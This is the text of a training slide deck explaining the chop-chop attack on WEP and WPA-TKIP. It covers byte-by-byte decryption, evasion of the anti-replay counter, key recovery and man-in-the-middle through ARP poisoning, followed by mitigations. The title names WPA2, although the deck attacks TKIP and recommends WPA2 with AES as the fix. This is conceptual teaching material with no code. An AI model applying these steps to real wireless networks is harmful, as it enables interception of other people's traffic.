Breaking WPA2 with chop-chop attack : Breaking WPA2 with chop-chop attack Marcell FÓTI
CEH, ECSA, MCSE, MCDBA, Security MVP, MCT
Unclearable history: WEP : RC4 encryption How a WEP packet looks like? Unclearable history: WEP Data CRC-32
Weaknesses in WEP : Yes, the „random” IV is predictable,
Yes, RC4 is not strong enough,
Yes, there is no rekeying, but the worst is…
The encrypted packet can be guessed byte by byte, without the key! Weaknesses in WEP
Traditional chop-chop : There is an easy formula to correct the encrypted(!) CRC on damaged encrypted(!) WEP packets
Supposing we know what was lost
If we don’t know what is missing, we can guess it Traditional chop-chop
The WEP-quiz : Sniff an encrypted packet
Chop one byte from the end.
This is the secret to reveal
Correct the damaged packet by using the formula, supposing the secret byte was 1
Send the (supposedly) „repaired” packet to the AP
If it broadcasts it, we were right
If not, try to repair the checksum with 2 then 3,4… until we win
Go to step 2, get the next secret byte The WEP-quiz
The result of chop-chop : After the attack we’ll have
The encrypted packet (E)
The packet in clear (C)
E XOR C = WEP session key ? The result of chop-chop
The strengths of WPA : More random IV ?
Additional crypto-checksum
Michael, the Message Intergrity Check
Lock out for 1 minute after 2 MIC failures in 60 secs
Counter in the AP to get rid of replayed packets
Rekeying in every hour (3600 secs)
But what about compatibility?
It is compatible with WEP! The strengths of WPA
The inherent weakness of WPA : It is still encrypted with RC4
Poor Michael is second in the line, so
We can guess byte by byte using chop-chop with full speed, if
We can avoid the anti-replay counter
There are 8 subchannels in WPA
Clients always use channel 0
We have 7 more subchannels with counter values way below ours
The „good result” is a MIC failure report ?
We can guess 1 byte per minute ?
Then we get 1 minute relax The inherent weakness of WPA
What we can do with WPA? : There is a reverse-Michael algorithm to get the session key
Input parameters we need
The actual MIC value in clear text (8 mins, chop-chop)
And a packet in clear text…
Have a look at an ARP packet
42 encrypted bytes
But only 2 bytes are unknown (2 mins, chop-chop)
We can decrypt the AP’s key – not the clients’
So we are an AP now!
We can start broadcasting ARP poisoning packets
MITM begins… What we can do with WPA?
How to prevent this? : Set rekeying frequency to 120 secs instead of 3600 secs
Disable TKIP, use AES instead (WPA2)
…means get rid of lots of ancient hardware
Disable MIC failure Report How to prevent this?
Let’s do it! : Let’s do it! End of theory. And now... LAB: Chop-chop attack (30 minutes)